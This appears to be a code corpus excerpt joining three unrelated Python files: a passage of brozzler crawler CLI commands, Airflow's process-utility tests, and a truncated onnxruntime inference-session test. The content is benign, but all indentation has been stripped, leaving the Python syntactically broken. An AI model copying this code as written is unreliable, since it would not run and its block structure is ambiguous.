argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-new-job - queue new job with brozzler',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'job_conf_file', metavar='JOB_CONF_FILE',
help='brozzler job configuration file in yaml')
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
try:
brozzler.new_job_file(frontier, args.job_conf_file)
except brozzler.InvalidJobConf as e:
print('brozzler-new-job: invalid job file:', args.job_conf_file, file=sys.stderr)
print(' ' + yaml.dump(e.errors).rstrip().replace('\n', '\n '), file=sys.stderr)
sys.exit(1)
def brozzler_new_site(argv=None):
'''
Command line utility entry point for queuing a new brozzler site.
Takes a seed url and creates a site and page object in rethinkdb, which
brozzler-workers will look at and start crawling.
'''
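# Illustrative invocation (hypothetical values, using options defined below):
#   brozzler-new-site --time-limit 3600 --ignore-robots https://example.com/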
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-new-site - register site to brozzle',
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument('seed', metavar='SEED', help='seed url')
add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'--time-limit', dest='time_limit', default=None,
help='time limit in seconds for this site')
arg_parser.add_argument(
'--ignore-robots', dest='ignore_robots', action='store_true',
help='ignore robots.txt for this site')
arg_parser.add_argument(
'--warcprox-meta', dest='warcprox_meta',
help=(
'Warcprox-Meta http request header to send with each request; '
'must be a json blob, ignored unless warcprox features are '
'enabled'))
arg_parser.add_argument(
'--behavior-parameters', dest='behavior_parameters',
default=None, help=(
'json blob of parameters to populate the javascript behavior '
'template, e.g. {"parameter_username":"x",'
'"parameter_password":"y"}'))
arg_parser.add_argument(
'--username', dest='username', default=None,
help='use this username to try to log in if a login form is found')
arg_parser.add_argument(
'--password', dest='password', default=None,
help='use this password to try to log in if a login form is found')
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
site = brozzler.Site(rr, {
'seed': args.seed,
'time_limit': int(args.time_limit) if args.time_limit else None,
'ignore_robots': args.ignore_robots,
'warcprox_meta': json.loads(
args.warcprox_meta) if args.warcprox_meta else None,
'behavior_parameters': json.loads(
args.behavior_parameters) if args.behavior_parameters else None,
'username': args.username,
'password': args.password})
frontier = brozzler.RethinkDbFrontier(rr)
brozzler.new_site(frontier, site)
def brozzler_worker(argv=None):
'''
Main entry point for brozzler: fetches sites and pages to brozzle from
rethinkdb and brozzles them.
'''
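# Illustrative invocation (hypothetical value; rethinkdb connection options come
# from add_rethinkdb_options below):
#   brozzler-worker --max-browsers 4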
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'-n', '--max-browsers', dest='max_browsers', default='1',
help='max number of chrome instances simultaneously browsing pages')
arg_parser.add_argument(
'--proxy', dest='proxy', default=None, help='http proxy')
arg_parser.add_argument(
'--warcprox-auto', dest='warcprox_auto', action='store_true',
help=(
'when needed, choose an available instance of warcprox from '
'the rethinkdb service registry'))
arg_parser.add_argument(
'--skip-extract-outlinks', dest='skip_extract_outlinks',
action='store_true', help=argparse.SUPPRESS)
arg_parser.add_argument(
'--skip-visit-hashtags', dest='skip_visit_hashtags',
action='store_true', help=argparse.SUPPRESS)
arg_parser.add_argument(
'--skip-youtube-dl', dest='skip_youtube_dl',
action='store_true', help=argparse.SUPPRESS)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
brozzler.chrome.check_version(args.chrome_exe)
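# SIGQUIT handler: logs a stack trace for every live thread and then re-arms
# itself, so a stuck worker can be inspected with `kill -QUIT <pid>` without
# stopping it.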
def dump_state(signum, frame):
signal.signal(signal.SIGQUIT, signal.SIG_IGN)
try:
state_strs = []
frames = sys._current_frames()
threads = {th.ident: th for th in threading.enumerate()}
for ident in frames:
if threads[ident]:
state_strs.append(str(threads[ident]))
else:
state_strs.append('<???:thread:ident=%s>' % ident)
stack = traceback.format_stack(frames[ident])
state_strs.append(''.join(stack))
logging.info(
'dumping state (caught signal %s)\n%s' % (
signum, '\n'.join(state_strs)))
except BaseException as e:
logging.error('exception dumping state: %s' % e)
finally:
signal.signal(signal.SIGQUIT, dump_state)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
service_registry = doublethink.ServiceRegistry(rr)
worker = brozzler.worker.BrozzlerWorker(
frontier, service_registry, max_browsers=int(args.max_browsers),
chrome_exe=args.chrome_exe, proxy=args.proxy,
warcprox_auto=args.warcprox_auto,
skip_extract_outlinks=args.skip_extract_outlinks,
skip_visit_hashtags=args.skip_visit_hashtags,
skip_youtube_dl=args.skip_youtube_dl)
signal.signal(signal.SIGQUIT, dump_state)
signal.signal(signal.SIGTERM, lambda s,f: worker.stop())
signal.signal(signal.SIGINT, lambda s,f: worker.stop())
th = threading.Thread(target=worker.run, name='BrozzlerWorkerThread')
th.start()
th.join()
logging.info('brozzler-worker is all done, exiting')
def brozzler_ensure_tables(argv=None):
'''
Creates rethinkdb tables if they don't already exist. Brozzler
(brozzler-worker, brozzler-new-job, etc) normally creates the tables it
needs on demand at startup, but if multiple instances are starting up at
the same time, you can end up with duplicate broken tables. So it's a good
idea to use this utility at an early step when spinning up a cluster.
'''
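# Illustrative one-off invocation when spinning up a cluster (console-script
# name assumed from this function's name):
#   brozzler-ensure-tables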
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
# services table
doublethink.ServiceRegistry(rr)
# sites, pages, jobs tables
brozzler.frontier.RethinkDbFrontier(rr)
class Jsonner(json.JSONEncoder):
def default(self, o):
if isinstance(o, datetime.datetime):
return o.isoformat()
elif isinstance(o, bytes):
return base64.b64encode(o).decode('ascii')
else:
return json.JSONEncoder.default(self, o)
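# Illustrative sketch: Jsonner lets json.dumps handle values the stock encoder
# rejects, e.g.
#   json.dumps({'when': datetime.datetime.utcnow(), 'digest': b'\x00\xff'}, cls=Jsonner)
# datetimes are emitted as ISO-8601 strings and bytes as base64 text.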
def brozzler_list_jobs(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--active', dest='active', action='store_true', help=(
'list active jobs'))
group.add_argument(
'--all', dest='all', action='store_true', help=(
'list all jobs'))
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list only the specified job'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job is not None:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = rr.table('jobs').get(job_id)
logging.debug('querying rethinkdb: %s', reql)
result = reql.run()
if result:
results = [result]
else:
logging.error('no such job with id %r', job_id)
sys.exit(1)
else:
reql = rr.table('jobs').order_by('id')
if args.active:
reql = reql.filter({'status': 'ACTIVE'})
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_list_sites(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--active', dest='active', action='store_true', help=(
'list all active sites'))
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list sites for a particular job'))
group.add_argument(
'--jobless', dest='jobless', action='store_true', help=(
'list all jobless sites'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'list only the specified site'))
group.add_argument(
'--all', dest='all', action='store_true', help=(
'list all sites'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
reql = rr.table('sites')
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = reql.get_all(job_id, index='job_id')
elif args.jobless:
reql = reql.filter(~r.row.has_fields('job_id'))
elif args.active:
reql = reql.between(
['ACTIVE', r.minval], ['ACTIVE', r.maxval],
index='sites_last_disclaimed')
elif args.site:
reql = reql.get_all(args.site)
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_list_pages(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'list pages for all sites of a particular job'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'list pages for the specified site'))
# group.add_argument(
# '--page', dest='page', metavar='PAGE_ID', help=(
# 'list only the specified page'))
group = arg_parser.add_mutually_exclusive_group()
group.add_argument(
'--queued', dest='queued', action='store_true', help=(
'limit to queued pages'))
group.add_argument(
'--brozzled', dest='brozzled', action='store_true', help=(
'limit to pages that have already been brozzled'))
group.add_argument(
'--claimed', dest='claimed', action='store_true', help=(
'limit to pages that are currently claimed by a brozzler '
'worker'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
reql = rr.table('sites').get_all(job_id, index='job_id')['id']
logging.debug('querying rethinkdb: %s', reql)
site_ids = reql.run()
elif args.site:
try:
site_ids = [int(args.site)]
except ValueError:
site_ids = [args.site]
for site_id in site_ids:
reql = rr.table('pages')
if args.queued:
reql = reql.between(
[site_id, 0, r.minval], [site_id, 0, r.maxval],
index='least_hops')
elif args.brozzled:
reql = reql.between(
[site_id, 1, r.minval], [site_id, r.maxval, r.maxval],
index='least_hops')
else:
reql = reql.between(
[site_id, 0, r.minval], [site_id, r.maxval, r.maxval],
index='least_hops')
reql = reql.order_by(index="least_hops")
if args.claimed:
reql = reql.filter({'claimed': True})
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_purge(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
description='brozzler-purge - purge crawl state from rethinkdb',
formatter_class=BetterArgumentDefaultsHelpFormatter)
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--job', dest='job', metavar='JOB_ID', help=(
'purge crawl state from rethinkdb for a job, including all '
'sites and pages'))
group.add_argument(
'--site', dest='site', metavar='SITE_ID', help=(
'purge crawl state from rethinkdb for a site, including all '
'pages'))
group.add_argument(
'--finished-before', dest='finished_before', metavar='YYYY-MM-DD',
help=('purge crawl state from rethinkdb for jobs that ended '
'before this date'))
arg_parser.add_argument(
'--force', dest='force', action='store_true', help=(
'purge even if the job or site still has status ACTIVE'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
frontier = brozzler.RethinkDbFrontier(rr)
if args.job:
try:
job_id = int(args.job)
except ValueError:
job_id = args.job
job = brozzler.Job.load(rr, job_id)
if not job:
logging.fatal('no such job %r', job_id)
sys.exit(1)
if job.status == 'ACTIVE':
if args.force:
logging.warning(
'job %s has status ACTIVE, purging anyway because '
'--force was supplied', job_id)
else:
logging.fatal(
'refusing to purge job %s because status is ACTIVE '
'(override with --force)', job_id)
sys.exit(1)
_purge_job(rr, job_id)
elif args.site:
site_id = args.site
site = brozzler.Site.load(rr, site_id)
if not site:
logging.fatal('no such site %r', site_id)
sys.exit(1)
if site.status == 'ACTIVE':
if args.force:
logging.warning(
'site %s has status ACTIVE, purging anyway because '
'--force was supplied', site_id)
else:
logging.fatal(
'refusing to purge site %s because status is ACTIVE '
'(override with --force)', site_id)
sys.exit(1)
_purge_site(rr, site_id)
elif args.finished_before:
finished_before = datetime.datetime.strptime(
args.finished_before, '%Y-%m-%d').replace(
tzinfo=doublethink.UTC)
reql = rr.table('jobs').filter(
r.row['finished'].default(r.maxval).lt(finished_before).or_(
r.row['starts_and_stops'].nth(-1)['stop'].default(r.maxval).lt(finished_before)))
logging.debug(
'retrieving jobs older than %s: %s', finished_before, reql)
for job in reql.run():
# logging.info('job %s finished=%s starts_and_stops[-1]["stop"]=%s',
# job['id'], job.get('finished'),
# job.get('starts_and_stops', [{'stop':None}])[-1]['stop'])
_purge_job(rr, job['id'])
def _purge_site(rr, site_id):
reql = rr.table('pages').between(
[site_id, r.minval, r.minval],
[site_id, r.maxval, r.maxval],
index='priority_by_site').delete()
logging.debug('purging pages for site %s: %s', site_id, reql)
result = reql.run()
logging.info('purged pages for site %s: %s', site_id, result)
reql = rr.table('sites').get(site_id).delete()
logging.debug('purging site %s: %s', site_id, reql)
result = reql.run()
logging.info('purged site %s: %s', site_id, result)
def _purge_job(rr, job_id):
reql = rr.table('sites').get_all(job_id, index='job_id').get_field('id')
logging.debug('querying rethinkdb: %s', reql)
site_ids = list(reql.run())
for site_id in site_ids:
_purge_site(rr, site_id)
reql = rr.table('jobs').get(job_id).delete()
logging.debug('purging job %s: %s', job_id, reql)
result = reql.run()
logging.info('purged job %s: %s', job_id, result)
def brozzler_list_captures(argv=None):
'''
Handy utility for looking up entries in the rethinkdb "captures" table by
url or sha1.
'''
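# Illustrative invocations (hypothetical url and sha1 values; console-script
# name assumed from this function's name):
#   brozzler-list-captures --prefix http://example.com/
#   brozzler-list-captures sha1:SOMEBASE32DIGESTVALUE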
import urlcanon
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
arg_parser.add_argument(
'-p', '--prefix', dest='prefix', action='store_true', help=(
'use prefix match for url (n.b. may not work as expected if '
'searching key has query string because canonicalization can '
'reorder query parameters)'))
arg_parser.add_argument(
'--yaml', dest='yaml', action='store_true', help=(
'yaml output (default is json)'))
add_rethinkdb_options(arg_parser)
add_common_options(arg_parser, argv)
arg_parser.add_argument(
'url_or_sha1', metavar='URL_or_SHA1',
help='url or sha1 to look up in captures table')
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.url_or_sha1[:5] == 'sha1:':
if args.prefix:
logging.warning(
'ignoring supplied --prefix option which does not apply '
'to lookup by sha1')
# assumes it's already base32 (XXX could detect if hex and convert)
sha1base32 = args.url_or_sha1[5:].upper()
reql = rr.table('captures').between(
[sha1base32, r.minval, r.minval],
[sha1base32, r.maxval, r.maxval],
index='sha1_warc_type')
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
else:
key = urlcanon.semantic(args.url_or_sha1).surt().decode('ascii')
abbr_start_key = key[:150]
if args.prefix:
# surt is necessarily ascii and \x7f is the last ascii character
abbr_end_key = key[:150] + '\x7f'
end_key = key + '\x7f'
else:
abbr_end_key = key[:150]
end_key = key
reql = rr.table('captures').between(
[abbr_start_key, r.minval],
[abbr_end_key, r.maxval],
index='abbr_canon_surt_timestamp', right_bound='closed')
reql = reql.order_by(index='abbr_canon_surt_timestamp')
reql = reql.filter(
lambda capture: (capture['canon_surt'] >= key)
& (capture['canon_surt'] <= end_key))
logging.debug('querying rethinkdb: %s', reql)
results = reql.run()
if args.yaml:
yaml.dump_all(
results, stream=sys.stdout, explicit_start=True,
default_flow_style=False)
else:
for result in results:
print(json.dumps(result, cls=Jsonner, indent=2))
def brozzler_stop_crawl(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
prog=os.path.basename(argv[0]),
formatter_class=BetterArgumentDefaultsHelpFormatter)
group = arg_parser.add_mutually_exclusive_group(required=True)
add_rethinkdb_options(arg_parser)
group.add_argument(
'--job', dest='job_id', metavar='JOB_ID', help=(
'request crawl stop for the specified job'))
group.add_argument(
'--site', dest='site_id', metavar='SITE_ID', help=(
'request crawl stop for the specified site'))
add_common_options(arg_parser, argv)
args = arg_parser.parse_args(args=argv[1:])
configure_logging(args)
rr = rethinker(args)
if args.job_id:
try:
job_id = int(args.job_id)
except ValueError:
job_id = args.job_id
job = brozzler.Job.load(rr, job_id)
if not job:
logging.fatal('job not found with id=%r', job_id)
sys.exit(1)
job.stop_requested = doublethink.utcnow()
job.save()
elif args.site_id:
try:
site_id = int(args.site_id)
except ValueError:
site_id = args.site_id
site = brozzler.Site.load(rr, site_id)
if not site:
logging.fatal('site not found with id=%r', site_id)
sys.exit(1)
site.stop_requested = doublethink.utcnow()
site.save()
|
test_process_utils.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import subprocess
import time
import unittest
from contextlib import suppress
from subprocess import CalledProcessError
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import psutil
import pytest
from airflow.exceptions import AirflowException
from airflow.utils import process_utils
from airflow.utils.process_utils import check_if_pidfile_process_is_running, execute_in_subprocess, log
class TestReapProcessGroup(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(unused_signum, unused_frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(unused_signum, unused_frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestReapProcessGroup._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestReapProcessGroup._parent_of_ignores_sigterm, args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
process_utils.reap_process_group(parent_pid.value, logging.getLogger(), timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
os.kill(parent_pid.value, signal.SIGKILL) # terminate doesn't work here
os.kill(child_pid.value, signal.SIGKILL) # terminate doesn't work here
except OSError:
pass
class TestExecuteInSubProcess(unittest.TestCase):
def test_should_print_all_messages1(self):
with self.assertLogs(log) as logs:
execute_in_subprocess(["bash", "-c", "echo CAT; echo KITTY;"])
msgs = [record.getMessage() for record in logs.records]
self.assertEqual([
"Executing cmd: bash -c 'echo CAT; echo KITTY;'",
'Output:',
'CAT',
'KITTY'
], msgs)
def test_should_raise_exception(self):
with self.assertRaises(CalledProcessError):
process_utils.execute_in_subprocess(["bash", "-c", "exit 1"])
def my_sleep_subprocess():
sleep(100)
def my_sleep_subprocess_with_signals():
signal.signal(signal.SIGINT, lambda signum, frame: None)
signal.signal(signal.SIGTERM, lambda signum, frame: None)
sleep(100)
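# The two helpers above run as child processes in the tests below: the first
# simply sleeps, the second additionally installs no-op SIGINT/SIGTERM handlers
# so that only SIGKILL can stop it, which the force-kill test relies on.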
@pytest.mark.quarantined
class TestKillChildProcessesByPids(unittest.TestCase):
def test_should_kill_process(self):
before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
process = multiprocessing.Process(target=my_sleep_subprocess, args=())
process.start()
sleep(0)
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process + 1, num_process)
process_utils.kill_child_processes_by_pids([process.pid])
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process, num_process)
def test_should_force_kill_process(self):
before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
process = multiprocessing.Process(target=my_sleep_subprocess_with_signals, args=())
process.start()
sleep(0)
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process + 1, num_process)
with self.assertLogs(process_utils.log) as cm:
process_utils.kill_child_processes_by_pids([process.pid], timeout=0)
self.assertTrue(any("Killing child PID" in line for line in cm.output))
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process, num_process)
class TestPatchEnviron(unittest.TestCase):
def test_should_update_variable_and_restore_state_when_exit(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
self.assertEqual("AFTER", os.environ["TEST_NOT_EXISTS"])
self.assertEqual("AFTER", os.environ["TEST_EXISTS"])
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
def test_should_restore_state_when_exception(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
with suppress(AirflowException):
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
self.assertEqual("AFTER", os.environ["TEST_NOT_EXISTS"])
self.assertEqual("AFTER", os.environ["TEST_EXISTS"])
raise AirflowException("Unknown exception")
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
class TestCheckIfPidfileProcessIsRunning(unittest.TestCase):
def test_ok_if_no_file(self):
check_if_pidfile_process_is_running('some/pid/file', process_name="test")
def test_remove_if_no_process(self):
# Assert file is deleted
with self.assertRaises(FileNotFoundError):
with NamedTemporaryFile('+w') as f:
f.write('19191919191919191991')
f.flush()
check_if_pidfile_process_is_running(f.name, process_name="test")
def test_raise_error_if_process_is_running(self):
pid = os.getpid()
with NamedTemporaryFile('+w') as f:
f.write(str(pid))
f.flush()
with self.assertRaisesRegex(AirflowException, "is already running under PID"):
check_if_pidfile_process_is_running(f.name, process_name="test")
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
